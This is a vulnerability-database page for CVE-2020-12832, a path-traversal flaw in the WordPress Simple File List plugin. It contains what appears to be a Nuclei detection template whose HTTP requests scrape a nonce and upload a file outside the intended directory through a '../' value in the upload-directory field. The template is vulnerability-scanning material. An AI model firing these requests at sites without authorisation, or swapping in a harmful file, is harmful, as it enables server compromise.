| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| CVE-2020-12832 | 22 Dec 202400:00 | – | circl | |
| WordPress simple-file-list plugin path traversal vulnerability | 14 May 202000:00 | – | cnvd | |
| CVE-2020-12832 | 13 May 202017:52 | – | cve | |
| CVE-2020-12832 | 13 May 202017:52 | – | cvelist | |
| EUVD-2020-5114 | 7 Oct 202500:30 | – | euvd | |
| CVE-2020-12832 | 13 May 202018:15 | – | nvd | |
| CVE-2020-12832 | 13 May 202018:15 | – | osv | |
| WordPress Simple File List plugin <= 4.2.7 - Authenticated Arbitrary File Deletion vulnerability | 16 May 202000:00 | – | patchstack | |
| Input validation | 13 May 202018:15 | – | prion | |
| PT-2020-13280 | 13 May 202000:00 | – | ptsecurity |
id: CVE-2020-12832
info:
name: WordPress Simple File List - Path Traversal
author: riteshs4hu
severity: critical
description: |
Simple File List plugin allows path traversal via file upload, enabling files to be written outside the upload directory.
impact: |
Attackers can delete arbitrary files on the server, potentially causing data loss or service disruption.
remediation: |
Update to version 4.2.8 or later.
reference:
- https://wpscan.com/vulnerability/422360b9-4c70-4fd9-9833-375f1294bd7a/
- http://nvd.nist.gov/vuln/detail/CVE-2020-12832
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-12832
epss-score: 0.07131
epss-percentile: 0.93491
cwe-id: CWE-22
cpe: cpe:2.3:a:simplefilelist:simple-file-list:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 3
vendor: Simple File List
product: Simple File List WordPress Plugin
tags: cve,cve2020,wp,wordpress,wp-plugin,traversal,simple-file-list,lfi,vkev
variables:
rand: "{{rand_base(7)}}"
http:
- raw:
- |
GET /?rest_route=/wp/v2/pages&per_page=100 HTTP/1.1
Host: {{Hostname}}
extractors:
- type: json
name: slug
json:
- '.[] | select(.content.rendered | contains("eeSFL_UploadGo")) | .slug'
internal: true
- raw:
- |
GET {{slug}}/ HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: sflnonce
group: 1
regex:
- 'name="ee-simple-file-list-upload-nonce"[^>]*?value="([A-Za-z0-9]+)"'
internal: true
- type: regex
name: sflid
group: 1
regex:
- 'id="eeSFL_ID">([0-9]+)'
internal: true
- type: regex
name: ext
group: 1
regex:
- 'eeSFL_FileFormats\s*=\s*"([A-Za-z0-9]+)'
internal: true
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytA7kTuCe4IHDaUBZ
------WebKitFormBoundarytA7kTuCe4IHDaUBZ
Content-Disposition: form-data; name="action"
sfl_upload_job
------WebKitFormBoundarytA7kTuCe4IHDaUBZ
Content-Disposition: form-data; name="file"; filename="{{rand}}.{{ext}}"
Content-Type: application/octet-stream
{{rand}}
------WebKitFormBoundarytA7kTuCe4IHDaUBZ
Content-Disposition: form-data; name="eeSFL_ID"
{{sflid}}
------WebKitFormBoundarytA7kTuCe4IHDaUBZ
Content-Disposition: form-data; name="eeSFL_FileUploadDir"
wp-content%2Fuploads%2Fsimple-file-list%2F..%2F
------WebKitFormBoundarytA7kTuCe4IHDaUBZ
Content-Disposition: form-data; name="ee-simple-file-list-upload"
{{sflnonce}}
------WebKitFormBoundarytA7kTuCe4IHDaUBZ--
- raw:
- |
GET /wp-content/uploads/{{rand}}.{{ext}} HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_all(body, "{{rand}}")'
condition: and
# digest: 4a0a00473045022046611f46d869d9ab13196943eefc391a0d1d249dea0b0acb4201917d7f6e3aee022100fabd9ad85b775a86b3b122eb64eb272a147e28464965330149825c6ea9b2fe85:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation